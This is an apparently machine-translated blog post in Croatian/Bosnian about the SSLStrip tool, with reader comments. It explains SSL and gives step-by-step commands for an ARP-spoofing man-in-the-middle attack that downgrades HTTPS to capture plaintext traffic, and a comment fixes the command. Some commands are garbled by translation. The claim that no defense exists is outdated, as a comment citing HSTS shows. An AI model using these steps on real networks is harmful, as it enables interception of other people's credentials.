Moxie Marlinspike predstavljena na Crni šešir 2009 izvrstan alat koji se zove SSLStrip, usmjereno na natjerajte korisnika da vjeruje da je na web lokaciji sa SSL šifriranjem, dok se zapravo svi podaci prenose na otvorenom. Uz to, SSLStrip također prevari web server, čija se navodna enkripcija zaobilazi iako se web lokacija i dalje ponaša kao da radi.
Koliko sam mogao shvatiti, ova metoda i dalje izvrsno funkcionira. Prijetnja još uvijek postoji i svi smo izloženi. Buahaha ... |
Počnimo s osnovama: koji je vrag SSL?
Za one koji ne znaju, Secure Sockets Layer (SSL; protokol sigurnosnog sloja utičnice) i njegov nasljednik Transport Layer Security (TLS; sigurnost transportnog sloja) su kriptografski protokoli koji pružaju sigurnu komunikaciju putem mreže, obično Internet.
SSL se izvodi na sloju između aplikacijskih protokola kao što su HTTP, SMTP, NNTP i preko protokola TCP transporta, koji je dio TCP / IP porodice protokola. Iako može pružiti sigurnost za bilo koji protokol koji koristi pouzdane veze (kao što je TCP), u većini slučajeva koristi se zajedno s HTTP-om za formiranje HTTPS-a. HTTPS koristi se za zaštitu web stranica na Internetu za web aplikacije. elektronska trgovina, pomoću certifikata javnih ključeva za provjeru identiteta krajnjih točaka.
SSLStrip ... da li se pornografija vratila na Let's Use Linux?
Operacija SSLStrip jednostavno je, zamijeniti sve HTTPS zahtjeve web stranice putem HTTP-a, a zatim vrši MITM (napad «Čovek na sredini«) Između servera i klijenta. Ideja je da žrtva i napadač komuniciraju putem HTTP-a, dok napadač i server komuniciraju putem HTTPS-a sa sertifikatom servera. Dakle, napadač je u stanju vidjeti sav promet otvorenog teksta žrtve.
Evo videozapisa na kojem možemo vidjeti kako funkcionira ovaj izvrsni alat.
Kako se koristi SSLStrip
1.- Konfigurirajte prosljeđivanje IP-a
echo 1> / proc / sys / net / ipv4 / ip_forward
2.- Izvođenje ARP MITM napada između 2 mašine:
arpspoof -i eth0 -t VODITELJ VICTIMA
3.- Preusmjeri promet sa iptables:
iptables -t nat -A PREROUTING -p tcp –odredišni port 80 -j REDIRECT –to-ports 8080
4.- Pokrenite SSLStrip na korištenom portu
python sslstrip.py -w datoteka
Kako se zaštititi od SSLStrip napada?
Ovo je najljepše i najstrašnije: ne može.
Kao što je pokazao Moxie (njegov video ne gubi se nešto više od 69 minuta) jedino vjerovatno rješenje za sve ovo je šifriranje svih HTTP veza, odnosno da uobičajeni i divlji "HTTP" u svim svojim slučajevima bude zamijenjen "HTTPS", bez obzira na stranicu ili uslugu . Kao što je Moxie rekla, 'problem predstavlja sigurni protokol koji ovisi o nesigurnom protokolu".
Šta barem možete učiniti kao korisnik smanjiti šanse za napad? Provjerite na paranoičan način da se ispred svake stranice koja je ugrožena nalazi "https" ili u slučaju instalacije korisnika Firefoxa NoScript i prisiliti HTTPS veze na svim stranicama. Pa ipak, ovo bi samo minimiziralo učinak, a ne i negiralo ga.
Izvor: zmajeva tegla & Moxie
Mmmm ... što se tiče https-a koji vas štiti od prečice, relativan je.
Ne znam u kojoj mjeri mitm napadi nisu uspješni protiv SSL veza, mitm napadi rade na sloju veze dok ssl na transportnom sloju, tako da je moguće hvatanje podataka.
Davno sam radio testove za rad na tečaju koji sam radio sa mitm-om u svojoj lokalnoj mreži i moguće je uzeti podatke poslane SSL-om, isprobati hotmail (što je ssl) i to bez problema vraća prolaz. Samo pomislite da se napadač lažno predstavlja kao da je pristupnik i prima sve informacije od žrtve.
Jedini način da saznate da vaše informacije sigurno putuju je upotreba ssh tunela.
Ono što radim ako se osjećam pomalo progonjenim je da se povežem sa svojim serverom pomoću ssh-a, prođem kroz lokalni port, otvorim utičnice i koristim svoju internetsku vezu kod kuće za navigaciju dok sam na tuđem računaru.
I kao što su rekli, ne postoji način da se izbjegne ovaj napad, osim da se osigura naš dhcp pomoću mac-a i osigura ko se poveže ...
zdravo, u naredbi 4 nedostajao vam je "-l 8080"
U redu. hvala!
Da budemo precizniji, tačka u kojoj se više ne možete zaštititi jednom je uhvaćena u MitM napadu. Postoje različiti načini da se zaštitite od ovog napada, iako je to teško jer ima varijante.
EDIT:
Ažuriranje komentara vrijedi! Otkrio sam da barem od januara 2012. preglednici chrome i firefox (ne bih se iznenadio da su svi u ovom trenutku) koriste HSTS zaglavlja. Pritom, ovo zaglavlje rješava ranjivost obavještavanjem preglednika da "veze" moraju uvijek koristiti SSL nakon prvog pokušaja povezivanja s web lokacijom (ovo ranjivost održava minimalno prisutnom). Nadalje, Chrome povećava sigurnost dodavanjem liste HSTS web lokacija (vjerojatno najpopularnijih na webu). izvor: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/
Vrlo dobro, mislim da je super cool. Ideja je zaista jednostavna 😀
Kao i…
Zna li netko može li se arpspoof koristiti kada imamo više od jednog domaćina na mreži? Hvala ti.